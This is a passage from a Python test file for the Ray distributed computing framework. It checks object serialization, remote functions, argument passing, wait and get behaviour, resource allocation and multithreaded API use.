elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
# Test StringIO serialization
s = io.StringIO(u"Hello, world!\n")
s.seek(0)
line = s.readline()
s.seek(0)
assert ray.get(ray.put(s)).readline() == line
def test_nested_functions(ray_start_regular):
# Make sure that remote functions can use other values that are defined
# after the remote function but before the first function invocation.
@ray.remote
def f():
return g(), ray.get(h.remote())
def g():
return 1
@ray.remote
def h():
return 2
assert ray.get(f.remote()) == (1, 2)
# Test a remote function that recursively calls itself.
@ray.remote
def factorial(n):
if n == 0:
return 1
return n * ray.get(factorial.remote(n - 1))
assert ray.get(factorial.remote(0)) == 1
assert ray.get(factorial.remote(1)) == 1
assert ray.get(factorial.remote(2)) == 2
assert ray.get(factorial.remote(3)) == 6
assert ray.get(factorial.remote(4)) == 24
assert ray.get(factorial.remote(5)) == 120
# Test remote functions that recursively call each other.
@ray.remote
def factorial_even(n):
assert n % 2 == 0
if n == 0:
return 1
return n * ray.get(factorial_odd.remote(n - 1))
@ray.remote
def factorial_odd(n):
assert n % 2 == 1
return n * ray.get(factorial_even.remote(n - 1))
assert ray.get(factorial_even.remote(4)) == 24
assert ray.get(factorial_odd.remote(5)) == 120
def test_ray_recursive_objects(ray_start_regular):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
if ray.worker.USE_NEW_SERIALIZER:
# Serialize the recursive objects.
for obj in recursive_objects:
ray.put(obj)
else:
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start_regular):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start_regular):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(ray_start_regular):
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(ray_start_regular):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.ray_start()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
assert ray.get(g._remote()) == []
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
@ray.remote
class Actor2(object):
def __init__(self):
pass
def method(self):
pass
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
a2 = Actor2._remote()
ray.get(a2.method._remote())
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_many_fractional_resources(shutdown_only):
ray.init(num_cpus=2, num_gpus=2, resources={"Custom": 2})
@ray.remote
def g():
return 1
@ray.remote
def f(block, accepted_resources):
true_resources = {
resource: value[0][1]
for resource, value in ray.get_resource_ids().items()
}
if block:
ray.get(g.remote())
return true_resources == accepted_resources
# Check that the resource are assigned correctly.
result_ids = []
for rand1, rand2, rand3 in np.random.uniform(size=(100, 3)):
resource_set = {"CPU": int(rand1 * 10000) / 10000}
result_ids.append(f._remote([False, resource_set], num_cpus=rand1))
resource_set = {"CPU": 1, "GPU": int(rand1 * 10000) / 10000}
result_ids.append(f._remote([False, resource_set], num_gpus=rand1))
resource_set = {"CPU": 1, "Custom": int(rand1 * 10000) / 10000}
result_ids.append(
f._remote([False, resource_set], resources={"Custom": rand1}))
resource_set = {
"CPU": int(rand1 * 10000) / 10000,
"GPU": int(rand2 * 10000) / 10000,
"Custom": int(rand3 * 10000) / 10000
}
result_ids.append(
f._remote(
[False, resource_set],
num_cpus=rand1,
num_gpus=rand2,
resources={"Custom": rand3}))
result_ids.append(
f._remote(
[True, resource_set],
num_cpus=rand1,
num_gpus=rand2,
resources={"Custom": rand3}))
assert all(ray.get(result_ids))
# Check that the available resources at the end are the same as the
# beginning.
stop_time = time.time() + 10
correct_available_resources = False
while time.time() < stop_time:
if (ray.available_resources()["CPU"] == 2.0
and ray.available_resources()["GPU"] == 2.0
and ray.available_resources()["Custom"] == 2.0):
correct_available_resources = True
break
if not correct_available_resources:
assert False, "Did not get correct available resources."
def test_get_multiple(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(ray_start_regular):
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Wait 0.1 second for the objects to be deleted.
# 4. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(address=cluster.address)
class RawActor(object):
def get(self):
